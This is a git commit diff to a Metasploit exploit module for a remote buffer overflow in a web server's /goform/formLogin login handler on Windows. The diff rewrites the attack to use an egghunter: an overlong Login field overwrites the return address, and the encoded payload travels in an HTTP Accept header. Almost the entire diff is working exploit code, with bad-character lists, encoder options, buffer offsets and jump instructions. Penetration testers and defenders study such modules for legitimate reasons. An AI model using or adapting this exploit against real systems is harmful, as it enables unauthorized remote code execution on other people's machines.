much needed patch worked like a champ in my enviroment.
git-svn-id: file:///home/svn/framework3/trunk@14132 4d416f70-5f16-0410-b530-b9f4589650daunstable
Mario Ceballos
parent
d55dc551b6
commit
0890cca02a
|
|
@ -14,7 +14,8 @@ require 'msf/core'
|
|||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = AverageRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Remote::Egghunter
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -24,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Sending a specially crafted POST request with an overly long Login string, an
|
||||
attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'Author' => [ 'MC', 'sinn3r' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
|
|
@ -39,10 +40,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 650,
|
||||
#'Space' => 600,
|
||||
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a",
|
||||
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
|
||||
'EncoderOptions' => { 'BufferRegister'=>'EDI' },
|
||||
'StackAdjustment' => -3500,
|
||||
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
|
|
@ -57,27 +59,35 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
|
||||
opts = { :checksum => true }
|
||||
hunter,p = generate_egghunter(payload.encoded, payload_badchars, opts)
|
||||
|
||||
sploit = rand_text_alpha_upper(2024)
|
||||
|
||||
# Around 600 bytes of room for egghunter
|
||||
sploit[633,2] = Rex::Arch::X86.jmp_short(24)
|
||||
sploit[635,4] = [target.ret].pack('V')
|
||||
sploit[639,32] = make_nops(32)
|
||||
sploit[671,payload.encoded.length] = payload.encoded
|
||||
|
||||
data = "HtmlOnly=true&Login=" + sploit + "+passwd&Password=&loginButton=Submit+Login"
|
||||
|
||||
req = "POST /goform/formLogin HTTP/1.1\r\n"
|
||||
req << "Host: #{rhost}:#{rport}\r\n"
|
||||
req << "Content-Length: #{data.length}" + "\r\n\r\n" + data + "\r\n\r\n"
|
||||
|
||||
connect
|
||||
sploit[671,hunter.length] = hunter
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
sock.put(req)
|
||||
|
||||
req = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => '/goform/formLogin',
|
||||
'vars_post' => {
|
||||
'HtmlOnly' => 'true',
|
||||
'Login' => sploit + 'passwd',
|
||||
'Password' => '',
|
||||
'loginButton' => 'Submit+Login'
|
||||
},
|
||||
'headers' => {
|
||||
'Accept' => p
|
||||
}
|
||||
}, 10)
|
||||
|
||||
select(nil,nil,nil,5)
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue